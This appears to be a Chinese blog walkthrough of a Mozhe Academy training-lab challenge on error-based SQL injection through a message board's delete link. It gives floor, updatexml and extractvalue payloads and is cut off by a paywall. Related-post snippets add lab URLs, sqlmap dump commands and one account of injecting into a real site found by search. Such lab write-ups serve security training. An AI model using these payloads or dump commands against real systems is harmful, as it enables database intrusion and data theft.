【墨者学院】SQL注入漏洞测试(delete注入)

最新推荐文章于 2025-06-10 11:09:41 发布
最新推荐文章于 2025-06-10 11:09:41 发布
阅读量1.9k 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: 在线靶场 文章标签: 墨者学院 sql注入 delete注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43884770/article/details/84789651
背景介绍

最近有人匿名给工程师留言说,感谢他的辛勤付出,把墨者学院建设的这么好,不料激发了工程师对留言板的一波操作,轻松查到了这个人的身份。

实训目标

1、熟练掌握留言板的工作原理;
2、善用burp抓取数据包;

解题方向

抓取数据包加以分析。
靶场

1、判断注入类型

在?Id=62后面输入单引号报错,初步判定存在报错型注入,报错型注入的方法大概有10种左右,这里分别使用floor、updatexml和extractvalue三种方法。其他的exp、multipoint貌似不太行。

2、获取当前数据库信息
and (select 1 from(select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) as a from information_schema.columns group by a)b)
==============================================================================
and (updatexml(1,concat(0x7e,(select database()),0x7e),1))
==============================================================================
and (extractvalue(1, concat(0x5c,(select database()))))
===============================================
最低0.47元/天 解锁文章

200万优质内容无限畅学
SQL注入漏洞测试(delete注入)
qq_52718293的博客
12-09 2971
*首先关于报错型注入可以参考一下*文章了解 delecte注入的多种方法 这题我使用的是extractvalue函数 从此可以知道注入点在删除页面的url链接的id参数中,可由报错注入来爆库 1.爆库 (pikaqiu) http://219.153.49.228:48577/sqli_del.php?id=666 and extractvalue(1,concat(’~’,(select database()))) 2.爆表名(message) http://219.153.49.228:48577/
墨者学院mysql注入_【墨者学院】:SQL注入漏洞测试(delete注入)
weixin_36145482的博客
02-05 296
0x00.题目描述:背景介绍最近有人匿名给工程师留言说,感谢他的辛勤付出,把墨者学院建设的这么好,不料激发了工程师对留言板的一波操作,轻松查到了这个人的身份。实训目标1、熟练掌握留言板的工作原理;2、善用burp抓取数据包;解题方向抓取数据包加以分析。0x01.解题思路:靶场环境:主界面查看删除链接为:http://219.153.49.228:45611/sqli_del.php?id=65经过...
墨者SQL注入漏洞测试(delete注入)
zr1213159840的博客
12-14 543
这题是看了别人的思路才知道的,还是要多加学习呀。 首先是界面点进去后,点击留言发现会留言在界面上,我一直以为这个框子存在注入。结果不是的。 正确的姿势是留言后点击鼠标放在删除按钮上会在左下角出现删除的链接,其实想想也是,写入应该是insert注入才对啊。 那么我们是可以直接在链接上进行测试的 id=1 and 1=1--+ 试试 1=1和1=2测试后,发现是存在注入的,那么我们就从报错开始。 id=1 and (updatexml(1,concat(0x7e,(select database()),0
pikachu靶场通关笔记23 SQL注入06-delete注入(报错法)
最新发布
mooyuan的网络安全博客
06-10 1138
本系列为通过《pikachu靶场通关笔记》的SQL注入关卡(共10关)渗透集合,通过对delete注入关卡源码的代码审计找到安全风险的真实原因,讲解delete注入的原理并进行渗透实践,本文为SQL注入06之delete注入关卡的渗透部分。
墨者 - SQL注入漏洞测试(delete注入)
吃肉唐僧的博客
07-08 1070
在这里,当提交留言的时候,删除,左下角会出现id 测试注入 ,尝试order by ,失败 测试and,页面正常回显 试着用报错注入,and (updatexml(1,concat(0x7e,(select database()),0x7e),1)) 发现有注入点,数据库是pikaqiu, 在这里提醒大家不要用id=61~65进行注入,构造一个不存在的最好(如博主用的是...
墨者学院 SQL手工注入漏洞测试(MySQL数据库)
qq_48368964的博客
07-22 499
id=1 order by 5 回显异常,说明有四列字段。id=1 order by 1 回显正常。由于为root用户,所以可以高权限访问其他的数据库信息,可跨库查询信息,同一个服务器下的不同站点中的数据库均可查看。接下来进行信息收集,收集数据库的信息:操作系统,数据库名,数据库的用户,数据库的版本等。直接在可控变量后面随便输入值,看回显效果,回显不正常,可能存在SQL注入。观察url信息,为GET请求,存在可控变量,验证是否存在SQL注入。1 and 1=2 回显不正常,可能存在SQL注入
墨者学院SQL注入漏洞测试(POST)
2301_76631050的博客
07-22 392
这里第一个用户密码被禁用了,直接用第二个就好了。但是这里密码用了md5加密,去网上随便找一个md5解密。(我电脑里只有python3所以我输入python,多种环境的用python3执行)根据图片输入 ’ 发现页面报错了,那我们把 ’ 注释掉看看。在登陆界面随便输入账号密码,可以看到下方图片红色框,抓到了。我们点击此页面使用快捷键ctrl+r,然后来到重放器界面。然后打开sqlmap,kali也行(自带sqlmap)此题说是POST提交方式,所以我们需要用BP进行抓包。
墨者-SQL注入漏洞测试(报错盲注)
wh1sper、的博客
07-04 905
墨者-SQL注入漏洞测试前言一、sqlmap二、手注1.报错注入2.时间注入3.联合查询union被过滤总结 前言 本题为墨者学院在线靶场 进入题目发现是个登录界面,找了好久,最后在关于平台停机维护的通知的页面找到了注入点 判断注入类型,当输入?id=1’ and 1=1 %23时,页面显示正常。 ?id=1' and 1=1 %23 当输入?id=1’ and 1=2 %23时,页面显示不正常。 由此判断注入类型为单字符注入。 一、sqlmap 首先先清理sqlmap的缓存。 python sq
墨者学院-SQL注入漏洞测试(布尔盲注)
weixin_42939822的博客
03-20 4487
决心按部就班、由浅入深地去剖析下sql注入题目提供的靶场环境,完善自身解题思路。本题靶场环境比较简单、也比较常见,没有设置严格的过滤规则,仅仅是限制了页面的回显功能,属于比较初级的sql注入题目。废话不多说啦,先附上题目链接:https://www.mozhe.cn/bug/detail/UDNpU0gwcUhXTUFvQm9HRVdOTmNTdz09bW96aGUmozhe*
SQL注入测试平台 SQLol -5.DELETE注入测试
05-26 556
  访问首页的delete模块,http://127.0.0.1/sql/delete.php,开始对delete模块进行测试。 delete语法: DELETE FROM 【users】 WHERE 【username】 = 【'1'】    几个位置都可能存在注入,这里只演示一种。 下面演示注入到不同位置的方法。   一、String in WHERE clause 构造P...
sql注入攻击实验
05-25
sql注入攻击,先自己搭建一个网站,链接数据库必须用Sa链接
0x36.SQL注入漏洞测试(delete注入)
qq_31679787的博客
12-10 318
抓包后发现存在id; 直接使用sqlmap进行爆数据; 得到key;
SQL注入漏洞测试(delete注入)——<墨者学院漏洞记录>
chick11的博客
07-16 465
1、 打开链接界面,可以自行测试留言 2、 提交留言,查看网页源代码 3、在浏览器中自行添加后缀,并使用单引号测试注入点,发现存在报错行注入,报错型注入的方法大概有10种左右,这里分别使用floor、updatexml和extractvalue三种常用的方法。 4、 使用extractvalue注入方法获取当前数据库信息 注入语句: and (extractvalue(1, concat(0x5c,(select database())))) 报错反馈得出数据库名称为
SQL注入漏洞实验
weixin_44940180的博客
05-09 860
实验来源于:Pikachu漏洞平台教学视频 ** 猜测后台sql语句怎么进行拼接,构造闭合 ** 一、数字型注入 随便选择后显示的信息 打开BP,抓包 设置id=100 or 1=1(真),GO 右侧看到显示全部的信息 二、字符型注入 字符型注入: 数据是否被单引号、双引号、括号等等包括起来 输入 ’ 会报错: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server ver
(9)SQL注入漏洞(实验)
weixin_45995579的博客
09-16 225
2021-9-16 --续 六、脱库(ctrl+c退出) 脱数据库 --dump-all sqlmap -u "http://106.52.39.144/Less-1/?id=1" --dump-all (脱所有数据库,动静太大,不能随便脱) sqlmap -u "http://106.52.39.144/Less-1/?id=1" -D security --dump (一般用这个) 七、调线程 --thread 调线程 范围1-10 sqlmap -u "htt...
墨者学院 - SQL注入漏洞测试(参数加密)
多崎巡礼的博客
09-28 2654
list.php 御剑扫描得到   http://219.153.49.228:48291/news/list.zip 解压得到源码 从decode方法可知:AES的数据块长度为128位,密钥为ydhaqPQnexoaDuW3,偏移量为2018201920202021,填充为zeropadding 第八行 :判断网页id后面的查询字符串值,先两次base64解密,再AES解密,删除_mo...
记一次SQL注入
weixin_50607688的博客
07-04 433
由于传参是需要进行base64编码的,所以在使用sqlmap的时候需要用到tamper脚本中的base64encode.py脚本,只需要在常规的语句中机上—tamper base64encode.py即可。我们都知道sql注入的传参有些是明文的,有些是经过编码或者加密的,所以我们搜索的时候不要仅限于inurl:.php?id=1,可以额外的尝试搜搜1的base64编码值MQ==,即可以搜索。id=MQ==搜索到了一处存在sql注入的网站。(7)获取其中admin表的字段值。(8)获取对应的值。
墨者学院SQL手工注入漏洞测试(MySQL数据库)
12-29
为了安全有效地进行SQL注入测试,建议在一个受控环境中操作。通常会搭建一个包含Nginx、PHP以及MySQL的靶场环境,在此环境下可以自由尝试各种攻击向量而不会影响生产数据。 #### 获取当前使用的数据库名称 通过构造...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值